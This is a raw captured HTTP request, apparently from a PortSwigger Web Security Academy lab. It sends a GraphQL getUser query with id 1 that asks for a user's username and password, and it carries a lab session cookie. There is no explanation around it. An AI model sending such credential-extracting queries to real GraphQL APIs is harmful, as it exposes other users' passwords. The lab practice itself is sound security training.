POST /graphql/v1 HTTP/2
Host: 0a63000f04fc25f8821979ff009e007b.web-security-academy.net
Cookie: session=Y62kpi6h7kDEuTmzqabQum96ZcysiRnV
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: de-DE,de;q=0.9
Accept: application/json
Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: application/json; charset=utf-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Origin: https://0a63000f04fc25f8821979ff009e007b.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a63000f04fc25f8821979ff009e007b.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Content-Length: 117
{"query":"query($id: Int!) {\n getUser(id: $id) {\n id\n username\n password\n }\n}","variables":{"id":1}}